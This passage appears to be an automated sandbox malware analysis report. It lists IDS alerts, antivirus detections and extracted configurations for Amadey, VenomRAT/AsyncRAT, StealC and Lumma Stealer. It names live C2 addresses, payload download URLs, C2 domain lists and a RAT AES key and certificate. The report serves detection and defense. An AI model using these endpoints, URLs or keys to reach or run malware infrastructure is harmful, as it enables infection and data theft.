2024-12-10T11:11:46.877765+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49950	104.21.32.1	443	TCP
2024-12-10T11:11:52.280070+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49987	104.21.32.1	443	TCP
2024-12-10T11:11:53.664367+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49994	104.21.32.1	443	TCP
2024-12-10T11:11:56.628576+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	50007	104.21.32.1	443	TCP
2024-12-10T11:11:58.637296+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	50014	104.21.32.1	443	TCP
2024-12-10T11:12:03.178884+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	50028	104.21.32.1	443	TCP
2024-12-10T11:12:20.006230+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	50093	104.21.32.1	443	TCP
2024-12-10T11:12:27.388054+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	50095	104.21.32.1	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:16.133320+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49849	185.215.113.43	80	TCP
2024-12-10T11:11:24.456515+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49868	185.215.113.43	80	TCP
2024-12-10T11:11:34.430634+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49906	185.215.113.43	80	TCP
2024-12-10T11:11:42.054488+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49933	185.215.113.43	80	TCP
2024-12-10T11:11:52.915393+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49988	185.215.113.43	80	TCP
2024-12-10T11:12:01.726459+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50020	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:22.635229+0100	2057921	1	Domain Observed Used for C2 Detected	192.168.2.5	50255	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:36.621191+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49912	104.21.32.1	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:38.910797+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49920	185.215.113.206	80	TCP
2024-12-10T11:11:52.205660+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49984	185.215.113.206	80	TCP
2024-12-10T11:12:32.255945+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50096	185.215.113.206	80	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:18.455224+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.5	49856	TCP
2024-12-10T11:11:24.458505+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.5	49869	TCP
2024-12-10T11:11:24.531434+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.5	49870	TCP
2024-12-10T11:11:24.540120+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.5	49871	TCP
2024-12-10T11:11:24.553433+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.5	49872	TCP
2024-12-10T11:11:25.593249+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.5	49878	TCP
2024-12-10T11:11:25.612537+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.5	49879	TCP
2024-12-10T11:11:26.928950+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.5	49882	TCP
2024-12-10T11:11:28.036916+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.5	49890	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:04.935438+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49816	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:14.796729+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	49827	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:09.373369+0100	2803305	3	Unknown Traffic	192.168.2.5	49828	31.41.244.11	80	TCP
2024-12-10T11:11:17.627523+0100	2803305	3	Unknown Traffic	192.168.2.5	49850	185.215.113.16	80	TCP
2024-12-10T11:11:26.279727+0100	2803305	3	Unknown Traffic	192.168.2.5	49880	185.215.113.16	80	TCP
2024-12-10T11:11:35.887902+0100	2803305	3	Unknown Traffic	192.168.2.5	49914	185.215.113.16	80	TCP
2024-12-10T11:11:43.519414+0100	2803305	3	Unknown Traffic	192.168.2.5	49937	185.215.113.16	80	TCP
2024-12-10T11:11:54.365845+0100	2803305	3	Unknown Traffic	192.168.2.5	49996	31.41.244.11	80	TCP
2024-12-10T11:11:54.447534+0100	2803305	3	Unknown Traffic	192.168.2.5	49951	104.16.185.241	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:53.668045+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49994	104.21.32.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://atten-supporse.biz/apid:	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/api1z	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/J	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/Jx%z	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/1521297942/H3tyh96.exe	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/api#z	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/api5J	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/well/random.exe_	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php%q%	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/luma/random.exe~	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/api2gJ	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpta	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/P0	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/apiyzf	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/api?	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/apiXv	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 7.2.H3tyh96.exe.3b0000.0.unpack	Malware Configuration Extractor: VenomRAT {"Server": "205.209.109.10", "Ports": "4449,7723", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "JrMOaJuxfZSKWpOLEGsB7P6ZlsENcx9t", "Mutex": "clgbfqzkkypxjps", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "H8FZjwfsbU+5QbalSNIQizpt1/rxF12H2U1U1U/ci6pnIjtgaUd68ZmpG5YOHKSodrWO/I7aiI0kwcJLPl+WmJpFAwqVu6ezRvLKXOEkudirmoqf32/ZBIgjugwr0jhfKmfgQMaVoblGsKmex14sg23sB5qlC/oX9PNzV0hkZqE=", "BDOS": "null"}
Source: 7.2.H3tyh96.exe.3b0000.0.unpack	Malware Configuration Extractor: AsyncRAT {"Server": "205.209.109.10", "Ports": "4449,7723", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "JrMOaJuxfZSKWpOLEGsB7P6ZlsENcx9t", "Mutex": "clgbfqzkkypxjps", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "H8FZjwfsbU+5QbalSNIQizpt1/rxF12H2U1U1U/ci6pnIjtgaUd68ZmpG5YOHKSodrWO/I7aiI0kwcJLPl+WmJpFAwqVu6ezRvLKXOEkudirmoqf32/ZBIgjugwr0jhfKmfgQMaVoblGsKmex14sg23sB5qlC/oX9PNzV0hkZqE=", "BDOS": "null", "External_config_on_Pastebin": "false"}
Source: 9e4b3ff3c2.exe.408.27.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
Source: 75f24a4b40.exe.5036.48.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["se-blurry.biz", "covery-mover.biz", "zinc-sneark.biz", "impend-differ.biz", "formy-spill.biz", "dwell-exclaim.biz", "dare-curbys.biz", "atten-supporse.biz", "print-vexer.biz"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\H3tyh96[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1013679001\2fdabbc809.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1013680001\f2da6a22b2.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	ReversingLabs: Detection: 84%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49935 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50095 version: TLS 1.2

Source:	Binary string: $$.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdbr source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\ClientAny.pdbpdbAny.pdbe source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?oC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegSvcs.pdblyF source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: H3tyh96.exe, 00000007.00000002.3359474514.0000000005256000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005EFF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3715237584.000000000A840000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3304967833.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbS source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdbegSvcs.pdbpdbvcs.pdbv4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdbp source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb089C< source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Stub\ClientAny.pdb source: ClientAny.exe, 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp, ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp, ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: H3tyh96.exe, 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.3115713877.00000000061B6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbs source: powershell.exe, 00000028.00000002.3172591010.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indoC:\Windows\ClientAny.pdb source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdby= source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: [symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdb7= source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\ClientAny.pdbdb source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: ClientAny.PDBF source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb8= source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: H3tyh96.exe, 00000007.00000002.3711157694.0000000009100000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: @o.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendFile.pdb source: H3tyh96.exe, 00000007.00000002.3710972877.0000000009050000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendMemory.pdb source: H3tyh96.exe, 00000007.00000002.3712425551.0000000009340000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Windows\ClientAny.pdb source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdbx source: H3tyh96.exe, 00000007.00000002.3359474514.0000000005256000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005EFF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3715237584.000000000A840000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: H3tyh96.exe, 00000007.00000002.3709759670.0000000008BB0000.00000004.10000000.00040000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.00000000060A5000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: $]q costura.dotnetzip.pdb.compressed source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F50000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbe=neutra source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\ClientAny.pdb source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.3304967833.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Stub\ClientAny.pdbi'9q source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbn source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\ClientAny.pdbont source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: $]q%costura.messagepacklib.pdb.compressed source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F50000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: pC:\Users\user\AppData\Local\Temp\ClientAny.PDB source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\ClientAny.pdberseFIqn! source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\ClientAny.pdb source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Extra.pdb source: H3tyh96.exe, 00000007.00000002.3712560611.0000000009360000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users.pdb source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 4x nop then jmp 09124133h	7_2_09123FA8
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 4x nop then inc dword ptr [ebp-30h]	7_2_09123AB0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 4x nop then inc dword ptr [ebp-30h]	7_2_0912B23E
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 4x nop then jmp 091A1389h	7_2_091A10B8
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 4x nop then jmp 091A1389h	7_2_091A10B8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49816 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49827
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49849 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.5:49856
Source: Network traffic	Suricata IDS: 2052265 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 205.209.109.10:4449 -> 192.168.2.5:49856
Source: Network traffic	Suricata IDS: 2052267 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 205.209.109.10:4449 -> 192.168.2.5:49856
Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.5:50255 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49867 -> 104.21.32.1:443
